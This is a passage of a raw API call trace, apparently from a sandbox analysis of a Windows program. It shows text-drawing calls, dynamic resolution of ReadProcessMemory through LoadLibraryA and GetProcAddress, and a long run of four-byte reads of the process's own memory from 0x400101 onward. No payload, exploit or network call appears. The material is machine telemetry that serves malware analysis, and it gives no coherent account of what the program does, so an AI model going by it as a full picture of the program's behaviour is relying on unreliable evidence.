(param_1="\r\n") returned 0x2 [0083.837] SysStringLen (param_1="\r\n") returned 0x2 [0083.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0083.837] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.837] TabbedTextOutA (hdc=0xc8010950, x=86, y=52, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0085.059] LoadLibraryA (lpLibFileName="KERNEL32 ") returned 0x759f0000 [0085.059] SetErrorMode (uMode=0x8001) returned 0x8001 [0085.059] GetProcAddress (hModule=0x759f0000, lpProcName="ReadProcessMemory") returned 0x75a1cfcc [0085.059] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400101, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.059] GetLastError () returned 0x0 [0085.059] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400102, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.059] GetLastError () returned 0x0 [0085.059] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400103, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.059] GetLastError () returned 0x0 [0085.059] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400104, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400105, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400106, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400107, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400108, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400109, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400110, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400111, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400112, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400113, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400114, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400115, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400116, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400117, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400118, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400119, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.060] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.060] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400120, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400121, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400122, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400123, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400124, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400125, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400126, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400127, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400128, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400129, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400130, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400131, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400132, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.061] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400133, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.061] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400134, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400135, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400136, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400137, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400138, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400139, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400140, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400141, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400142, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400143, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400144, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400145, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400146, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400147, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400148, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400149, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.062] GetLastError () returned 0x0 [0085.062] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400150, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400151, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400152, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400153, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400154, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400155, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400156, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400157, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400158, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400159, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 